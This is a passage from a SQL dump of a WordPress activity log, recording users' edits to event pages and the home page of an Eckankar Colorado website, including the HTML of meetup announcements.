Purpose'),(242668,41166,'attachment_parent_post_type','mec-events'),(242669,41166,'_message_key','attachment_created'),(242670,41166,'_user_id','15'),(242671,41166,'_user_login','john-admin-96'),(242672,41166,'_user_email','nadazipought@zilch.org'),(242673,41166,'_server_remote_addr','184.96.209.x'),(242674,41166,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269392&action=edit'),(242675,41167,'post_id','269392'),(242676,41167,'post_type','mec-events'),(242677,41167,'post_title','Happiness in Your Relationships'),(242678,41167,'post_prev_post_title','Copy of Life\'s Purpose'),(242679,41167,'post_new_post_title','Happiness in Your Relationships'),(242680,41167,'post_prev_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Go higher, further, deeper on your path of spiritual self-discovery!<br>\r\n</span></strong></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">Let your own unique talents and interests create a pathway of discovery that leads to your highest destiny as Soul! Become a creative expression of divine love, serving all life with gratitude and joy.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">\"The purpose of life is to become a Coworker with God. It means service to others, using our talents and interests to give hand, ear, or heart to another in need.\" --Harold Klemp, Past Lives, Dreams and Soul Travel, p. 17.</span></p>\r\n<p class=\"\"><span style=\"font-size: 14pt;\">You are invited to attend this interactive discussion, during which we will be utilizing the tools, exercises, techniques, stories, and inspiration in the ‘<a href=\"https://www.eckankar.org/wp-content/uploads/2021/02/Finding_Your_Lifes_Purpose.pdf\">Finding Your Life’s Purpose</a>‘ e-booklet </span><span style=\"font-size: 14pt;\">available for free online.</span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><a class=\"meetupreg\" href=\"https://www.meetup.com/segofaurora/events/296651140/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>&nbsp;</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242681,41167,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Key to Better Relationships<br>\r\n</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Keys to better relationships with everyone in your life.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“You are soul.&nbsp; </span><span style=\"font-size: 14pt;\">Learn your purpose in life, which is to become a vehicle for this divine love”</span><br>\r\n<span style=\"font-size: 14pt;\">— Sri Harold Klemp, \'<em>ECK Wisdom on Relationships</em>\' p. 27</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will discover:</span><br>\r\n<span style=\"font-size: 14pt;\">• The source of love</span><br>\r\n<span style=\"font-size: 14pt;\">• The secret of all relationships</span><br>\r\n<span style=\"font-size: 14pt;\">• How to love yourself</span><br>\r\n<span style=\"font-size: 14pt;\">• How to find solace when a loved one dies</span><br>\r\n<span style=\"font-size: 14pt;\">• Your bond of love with all life</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Come to share your thoughts, experiences, and questions in this lively discussion about the&nbsp;<em>Spiritual</em>&nbsp;side of&nbsp;<em>Relationships</em>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">No admission fee; just come and enjoy.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">-----------------------------------------------------------------------------------</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Booklet:</span><br>\r\n<span style=\"font-size: 14pt;\">The \'<em>ECK Wisdom on Relationships</em>\' booklet is a key for anyone wanting more love to give, more love to get. It\'s a key to better relationships with everyone in your life.</span><br>\r\n<span style=\"font-size: 14pt;\">It is described and available for purchase at the link below.&nbsp;</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.eckbooks.org/items/Spiritual_Wisdom_on_Relationships-75-0.html\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECK Wisdom on Relationships</a></span><br>\r\n<span style=\"font-size: 14pt;\">(small booklet, 68 pages -&nbsp;</span><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.eckbooks.org/content/pdf/Spir-Wsdm-Relationships_TOC.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">Table of Contents</a>)</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Video:</span><br>\r\n<span style=\"font-size: 14pt;\">Harold Klemp Shares Wisdom on Relationships:</span><br>\r\n<a href=\"https://www.youtube.com/watch?v=5eUV2iVYjn0\"><span style=\"font-size: 14pt;\">How to Become a Magnet for Love</span></a><br>\r\n<span style=\"font-size: 14pt;\">05:18 - YouTube</span><br>\r\n<span style=\"font-size: 14pt;\">This clip is from Harold Klemp\'s 2010 talk</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Blog:</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://eckankarblog.org/category/relationships/\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECKANKAR BLOG - Relationships Category</a></span><br>\r\n<span style=\"font-size: 14pt;\">Articles to answer your spiritual questions and inspire you to lead the most fulfilling of lives.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The next SEGA Meetup will be on Wednesday, January 3rd at 7:00 p.m.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Event Presented by </span><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECKANKAR</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><a class=\"meetupreg\" style=\"background-color: #ffffff;\" href=\"https://www.meetup.com/segofaurora/events/296819662/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>&nbsp;</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242682,41167,'post_prev_post_date','2023-11-17 07:33:03'),(242683,41167,'post_new_post_date','2023-11-17 07:49:17'),(242684,41167,'post_prev_post_author','2'),(242685,41167,'post_new_post_author','15'),(242686,41167,'post_prev_post_author/user_login','S8zhaBda'),(242687,41167,'post_prev_post_author/user_email','nada@zipnadanot.org'),(242688,41167,'post_prev_post_author/display_name','S8zhaBda'),(242689,41167,'post_new_post_author/user_login','john-admin-96'),(242690,41167,'post_new_post_author/user_email','nadazipought@zilch.org'),(242691,41167,'post_new_post_author/display_name','john-admin-96'),(242692,41167,'post_prev_thumb_id','269269'),(242693,41167,'post_prev_thumb_title','birds-chain-3'),(242694,41167,'post_new_thumb_id','269394'),(242695,41167,'post_new_thumb_title','Relationships2'),(242696,41167,'_message_key','post_updated'),(242697,41167,'_user_id','15'),(242698,41167,'_user_login','john-admin-96'),(242699,41167,'_user_email','nadazipought@zilch.org'),(242700,41167,'_server_remote_addr','184.96.209.x'),(242701,41167,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269392&action=edit'),(242702,41168,'post_id','269392'),(242703,41168,'post_type','mec-events'),(242704,41168,'post_title','Happiness in Your Relationships'),(242705,41168,'post_prev_post_date','2023-11-17 07:49:17'),(242706,41168,'post_new_post_date','2023-11-17 07:49:24'),(242707,41168,'_message_key','post_updated'),(242708,41168,'_user_id','15'),(242709,41168,'_user_login','john-admin-96'),(242710,41168,'_user_email','nadazipought@zilch.org'),(242711,41168,'_server_remote_addr','184.96.209.x'),(242712,41168,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269392&action=edit'),(242713,41169,'post_id','269392'),(242714,41169,'post_type','mec-events'),(242715,41169,'post_title','Happiness in Your Relationships'),(242716,41169,'post_new_thumb_id','269394'),(242717,41169,'post_new_thumb_title','Relationships2'),(242718,41169,'post_meta_added','78'),(242719,41169,'_message_key','post_updated'),(242720,41169,'_user_id','15'),(242721,41169,'_user_login','john-admin-96'),(242722,41169,'_user_email','nadazipought@zilch.org'),(242723,41169,'_server_remote_addr','184.96.209.x'),(242724,41169,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269392&action=edit'),(242725,41170,'post_id','269392'),(242726,41170,'post_type','mec-events'),(242727,41170,'post_title','Happiness in Your Relationships'),(242728,41170,'post_prev_post_content','<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Keys to Better Relationships<br>\n</span></strong></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Keys to better relationships with everyone in your life.</span></p>\n<blockquote class=\"\">\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“You are soul.&nbsp; </span><span style=\"font-size: 14pt;\">Learn your purpose in life, which is to become a vehicle for this divine love”</span><br>\n<span style=\"font-size: 14pt;\">— Sri Harold Klemp, \'<em>ECK Wisdom on Relationships</em>\' p. 27</span></p>\n</blockquote>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will discover:</span><br>\n<span style=\"font-size: 14pt;\">• The source of love</span><br>\n<span style=\"font-size: 14pt;\">• The secret of all relationships</span><br>\n<span style=\"font-size: 14pt;\">• How to love yourself</span><br>\n<span style=\"font-size: 14pt;\">• How to find solace when a loved one dies</span><br>\n<span style=\"font-size: 14pt;\">• Your bond of love with all life</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Come to share your thoughts, experiences, and questions in this lively discussion about the&nbsp;<em>Spiritual</em>&nbsp;side of&nbsp;<em>Relationships</em>.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">No admission fee; just come and enjoy.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">-----------------------------------------------------------------------------------</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Booklet:</span><br>\n<span style=\"font-size: 14pt;\">The \'<em>ECK Wisdom on Relationships</em>\' booklet is a key for anyone wanting more love to give, more love to get. It\'s a key to better relationships with everyone in your life.</span><br>\n<span style=\"font-size: 14pt;\">It is described and available for purchase at the link below.&nbsp;</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.eckbooks.org/items/Spiritual_Wisdom_on_Relationships-75-0.html\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECK Wisdom on Relationships</a></span><br>\n<span style=\"font-size: 14pt;\">(small booklet, 68 pages -&nbsp;</span><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.eckbooks.org/content/pdf/Spir-Wsdm-Relationships_TOC.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">Table of Contents</a>)</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Video:</span><br>\n<span style=\"font-size: 14pt;\">Harold Klemp Shares Wisdom on Relationships:</span><br>\n<a href=\"https://www.youtube.com/watch?v=5eUV2iVYjn0\"><span style=\"font-size: 14pt;\">How to Become a Magnet for Love</span></a><br>\n<span style=\"font-size: 14pt;\">05:18 - YouTube</span><br>\n<span style=\"font-size: 14pt;\">This clip is from Harold Klemp\'s 2010 talk</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Blog:</span><br>\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://eckankarblog.org/category/relationships/\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECKANKAR BLOG - Relationships Category</a></span><br>\n<span style=\"font-size: 14pt;\">Articles to answer your spiritual questions and inspire you to lead the most fulfilling of lives.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The next SEGA Meetup will be on Wednesday, January 3rd at 7:00 p.m.</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Event Presented by </span><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECKANKAR</a></span></p>\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\n<p class=\"mb-4\"><a class=\"meetupreg\" style=\"background-color: #ffffff;\" href=\"https://www.meetup.com/segofaurora/events/296819662/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\n</div>\n</div>\n</div>\n</div>\n<div class=\"boldgrid-section\">\n<div class=\"container\">\n<div class=\"row\">\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>&nbsp;</strong></span></p>\n</div>\n</div>\n</div>\n</div>'),(242729,41170,'post_new_post_content','<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><strong><span style=\"font-size: 18pt; color: #ad7f14;\">Keys to Better Relationships<br>\r\n</span></strong></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Keys to better relationships with everyone in your life.</span></p>\r\n<blockquote class=\"\">\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">“You are soul.&nbsp; </span><span style=\"font-size: 14pt;\">Learn your purpose in life, which is to become a vehicle for this divine love”</span><br>\r\n<span style=\"font-size: 14pt;\">— Sri Harold Klemp, \'<em>ECK Wisdom on Relationships</em>\' p. 27</span></p>\r\n</blockquote>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">You will discover:</span><br>\r\n<span style=\"font-size: 14pt;\">• The source of love</span><br>\r\n<span style=\"font-size: 14pt;\">• The secret of all relationships</span><br>\r\n<span style=\"font-size: 14pt;\">• How to love yourself</span><br>\r\n<span style=\"font-size: 14pt;\">• How to find solace when a loved one dies</span><br>\r\n<span style=\"font-size: 14pt;\">• Your bond of love with all life</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Come to share your thoughts, experiences, and questions in this lively discussion about the&nbsp;<em>Spiritual</em>&nbsp;side of&nbsp;<em>Relationships</em>.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">No admission fee; just come and enjoy.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">-----------------------------------------------------------------------------------</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Booklet:</span><br>\r\n<span style=\"font-size: 14pt;\">The \'<em>ECK Wisdom on Relationships</em>\' booklet is a key for anyone wanting more love to give, more love to get. It\'s a key to better relationships with everyone in your life.</span><br>\r\n<span style=\"font-size: 14pt;\">It is described and available for purchase at the link below.&nbsp;</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.eckbooks.org/items/Spiritual_Wisdom_on_Relationships-75-0.html\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECK Wisdom on Relationships</a></span><br>\r\n<span style=\"font-size: 14pt;\">(small booklet, 68 pages -&nbsp;</span><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://www.eckbooks.org/content/pdf/Spir-Wsdm-Relationships_TOC.pdf\" target=\"_blank\" rel=\"nofollow noopener ugc\">Table of Contents</a>)</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Video:</span><br>\r\n<span style=\"font-size: 14pt;\">Harold Klemp Shares Wisdom on Relationships:</span><br>\r\n<a href=\"https://www.youtube.com/watch?v=5eUV2iVYjn0\"><span style=\"font-size: 14pt;\">How to Become a Magnet for Love</span></a><br>\r\n<span style=\"font-size: 14pt;\">05:18 - YouTube</span><br>\r\n<span style=\"font-size: 14pt;\">This clip is from Harold Klemp\'s 2010 talk</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Blog:</span><br>\r\n<span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"https://eckankarblog.org/category/relationships/\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECKANKAR BLOG - Relationships Category</a></span><br>\r\n<span style=\"font-size: 14pt;\">Articles to answer your spiritual questions and inspire you to lead the most fulfilling of lives.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">The next SEGA Meetup will be on Wednesday, January 3rd at 7:00 p.m.</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">Event Presented by </span><span style=\"font-size: 14pt;\"><a class=\"!text-viridian\" href=\"http://www.eckankar-colorado.org/\" target=\"_blank\" rel=\"nofollow noopener ugc\">ECKANKAR</a></span></p>\r\n<p class=\"mb-4\"><span style=\"font-size: 14pt;\">***</span></p>\r\n<p class=\"mb-4\"><a class=\"meetupreg\" style=\"background-color: #ffffff;\" href=\"https://www.meetup.com/segofaurora/events/296819662/\" target=\"_blank\" rel=\"noopener noreferrer\">Register Now!</a></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\"><span style=\"font-size: 12pt;\"><strong>&nbsp;</strong></span></p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>'),(242730,41170,'post_prev_post_status','draft'),(242731,41170,'post_new_post_status','publish'),(242732,41170,'post_prev_post_date','2023-11-17 07:59:01'),(242733,41170,'post_new_post_date','2023-11-17 07:59:19'),(242734,41170,'post_prev_post_date_gmt','0000-00-00 00:00:00'),(242735,41170,'post_new_post_date_gmt','2023-11-17 14:59:19'),(242736,41170,'_message_key','post_updated'),(242737,41170,'_user_id','15'),(242738,41170,'_user_login','john-admin-96'),(242739,41170,'_user_email','nadazipought@zilch.org'),(242740,41170,'_server_remote_addr','184.96.209.x'),(242741,41170,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269392&action=edit'),(242742,41171,'user_id','2'),(242743,41171,'user_email','nada@zipnadanot.org'),(242744,41171,'user_login','S8zhaBda'),(242745,41171,'_user_id','2'),(242746,41171,'_user_login','S8zhaBda'),(242747,41171,'_user_email','nada@zipnadanot.org'),(242748,41171,'server_http_user_agent','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0'),(242749,41171,'_message_key','user_logged_in'),(242750,41171,'_server_remote_addr','76.130.120.x'),(242751,41171,'_server_http_referer','https://eckankar-colorado.org/wp-login.php?redirect_to=https%3A%2F%2Fwww.eckankar-colorado.org%2Fwp-admin%2F&reauth=1'),(242752,41172,'post_id','269387'),(242753,41172,'post_type','mec-events'),(242754,41172,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242755,41172,'_message_key','post_updated'),(242756,41172,'_user_id','2'),(242757,41172,'_user_login','S8zhaBda'),(242758,41172,'_user_email','nada@zipnadanot.org'),(242759,41172,'_server_remote_addr','76.130.120.x'),(242760,41172,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269387&action=edit'),(242761,41173,'post_id','269387'),(242762,41173,'post_type','mec-events'),(242763,41173,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242764,41173,'_message_key','post_updated'),(242765,41173,'_user_id','2'),(242766,41173,'_user_login','S8zhaBda'),(242767,41173,'_user_email','nada@zipnadanot.org'),(242768,41173,'_server_remote_addr','76.130.120.x'),(242769,41173,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269387&action=edit'),(242770,41174,'post_id','269387'),(242771,41174,'post_type','mec-events'),(242772,41174,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242773,41174,'_message_key','post_updated'),(242774,41174,'_user_id','2'),(242775,41174,'_user_login','S8zhaBda'),(242776,41174,'_user_email','nada@zipnadanot.org'),(242777,41174,'_server_remote_addr','76.130.120.x'),(242778,41174,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269387&action=edit'),(242779,41175,'post_id','269387'),(242780,41175,'post_type','mec-events'),(242781,41175,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242782,41175,'_message_key','post_updated'),(242783,41175,'_user_id','2'),(242784,41175,'_user_login','S8zhaBda'),(242785,41175,'_user_email','nada@zipnadanot.org'),(242786,41175,'_server_remote_addr','76.130.120.x'),(242787,41175,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269387&action=edit'),(242788,41176,'post_id','269387'),(242789,41176,'post_type','mec-events'),(242790,41176,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242791,41176,'_message_key','post_updated'),(242792,41176,'_user_id','2'),(242793,41176,'_user_login','S8zhaBda'),(242794,41176,'_user_email','nada@zipnadanot.org'),(242795,41176,'_server_remote_addr','76.130.120.x'),(242796,41176,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269387&action=edit'),(242797,41177,'post_id','269387'),(242798,41177,'post_type','mec-events'),(242799,41177,'post_title','The Power of Grace: A Secret to Spiritual Living'),(242800,41177,'post_prev_post_status','publish'),(242801,41177,'post_new_post_status','draft'),(242802,41177,'_message_key','post_updated'),(242803,41177,'_user_id','2'),(242804,41177,'_user_login','S8zhaBda'),(242805,41177,'_user_email','nada@zipnadanot.org'),(242806,41177,'_server_remote_addr','76.130.120.x'),(242807,41177,'_server_http_referer','https://eckankar-colorado.org/wp-admin/post.php?post=269387&action=edit'),(242808,41178,'term_id','205'),(242809,41178,'term_name','2023-2024-ESC Streaming Event'),(242810,41178,'term_taxonomy','media_folder'),(242811,41178,'_message_key','created_term'),(242812,41178,'_user_id','2'),(242813,41178,'_user_login','S8zhaBda'),(242814,41178,'_user_email','nada@zipnadanot.org'),(242815,41178,'_server_remote_addr','76.130.120.x'),(242816,41178,'_server_http_referer','https://eckankar-colorado.org/wp-admin/upload.php'),(242817,41179,'post_type','attachment'),(242818,41179,'attachment_id','269395'),(242819,41179,'attachment_title','streaming-web-promo-1'),(242820,41179,'attachment_filename','streaming-web-promo-1.jpg'),(242821,41179,'attachment_mime','image/jpeg'),(242822,41179,'attachment_filesize','78943'),(242823,41179,'_message_key','attachment_created'),(242824,41179,'_user_id','2'),(242825,41179,'_user_login','S8zhaBda'),(242826,41179,'_user_email','nada@zipnadanot.org'),(242827,41179,'_server_remote_addr','76.130.120.x'),(242828,41179,'_server_http_referer','https://eckankar-colorado.org/wp-admin/media-new.php'),(242829,41180,'post_id','7160'),(242830,41180,'post_type','page'),(242831,41180,'post_title','Home'),(242832,41180,'post_prev_post_content','<div style=\"height: 178px; width: 100%; margin-top: -129px; z-index: 1; position: absolute; overflow: hidden;\"><svg viewBox=\"0 0 500 150\" preserveAspectRatio=\"none\" style=\"height: 100%; width: 100%;\"><path d=\"M-3.10,41.93 C187.08,206.73 329.85,-11.33 500.00,49.98 L500.00,150.00 L0.00,150.00 Z\" style=\"stroke: none; fill: #ffffff;\"></path></svg></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 80px; border-width: 0px; padding-bottom: 55px;\">\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\">\r\n<p>&nbsp;</p>\r\n</div>\r\n<div class=\"col-lg-10 col-md-12 col-xs-12 col-sm-12 welcome-card\" style=\"border-width: 0px; background-color: #f8fbf8 !important; z-index: 2; margin-top: -235px;\">\r\n<p class=\"\" style=\"border-width: 0px; margin-left: auto; margin-right: auto; text-align: center; font-family: \'Raleway\'; font-size: 30px; color: #1e63bc; font-weight: 600;\" data-font-style=\"\" data-font-family=\"Raleway\" data-font-weight=\"600\">WELCOME TO ECKANKAR IN COLORADO!</p>\r\n<p class=\"\" style=\"text-align: center; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Does something inside you long to know life’s purpose? To make sense of the world around you?</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">You are Soul, an eternal, creative being. Unlimited. Divine.</p>\r\n<p class=\"\" style=\"font-size: 19px; text-align: center; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Eckankar is an active, individual, creative practice―a companion and road map for your journey home to the heights of Self-Discovery, God-Discovery, and beyond.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 19px; color: rgba(61, 61, 61, 0.88);\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\">Come along and discover the most secret part of yourself.</p>\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 21px; color: rgba(61, 61, 61, 0.88); margin-bottom: 2px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" data-font-style=\"\"><strong>Join us for the events below to discover your life as a spiritual adventure!</strong></p>\r\n</div>\r\n<div class=\"col-lg-1 col-md-12 col-sm-12 col-xs-12\"></div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 20px; border-radius: 3px; padding-bottom: -15px;\">\r\n<div class=\"col-lg-12 col-md-12 col-xs-12 col-sm-12\">\r\n<p class=\"\" style=\"font-size: 35px; color: #666666; text-align: center; font-weight: 500; box-shadow: #cecece 0px 0px 0px 0px inset; margin-bottom: 0px; font-family: Raleway;\" data-font-weight=\"500\" data-font-family=\"Raleway\" data-font-style=\"\">ECK SOUL ADVENTURE EVENTS</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"temp-gridblock-wrapper\"></div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 0px; padding-bottom: 6px;\">\r\n<div class=\"col-md-12 col-xs-12 col-sm-12 col-lg-12\">\r\n<p class=\"\">[MEC id=\"268667\"]</p>\r\n</div>\r\n</div>\r\n</div>\r\n</div>\r\n<div class=\"boldgrid-section\">\r\n<div class=\"container\">\r\n<div class=\"row\" style=\"padding-top: 23px; padding-bottom: 0px;\">\r\n<div class=\"col-lg-12 col-md-12 col-sm-12 col-xs-12\">\r\n<p class=\"\" style=\"text-align: center; border-width: 0px; font-family: Raleway; font-weight: 500; font-size: 36px; color: #697085;\" data-font-family=\"Raleway\" data-font-weight=\"500\" data-font-style=\"\">FOR YOU FROM ECKANKAR</p>\r\n</div>\r\n</div>\r\n<div class=\"row\" style=\"padding-bottom: 30px; padding-top: 10px;\">\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"padding: 10px 0;\"><img class=\"alignnone size-full wp-image-267648\" src=\"https://eckankar-colorado.org/wp-content/uploads/2023/01/hiker-path-1.jpg\" alt=\"\" width=\"744\" height=\"425\"></p>\r\n</div>\r\n<div class=\"col-lg-6 col-md-6 col-sm-6 col-xs-12\">\r\n<p class=\"\" style=\"border-width: 0px; color: #cd8a0e; font-family: \'Open Sans\'; font-weight: 600; font-size: 19px; margin-top: 30px;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">SPIRITUAL INSPIRATION</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 600; font-size: 29px; letter-spacing: 1px; color: #697085;\" data-font-family=\"Open Sans\" data-font-weight=\"600\" data-font-style=\"\">MORE ECK SOUL ADVENTURES</p>\r\n<p class=\"\" style=\"border-width: 0px; font-family: \'Open Sans\'; font-weight: 400; font-size: 17px;\" data-font-family=\"Open Sans\" data-font-weight=\"400\" 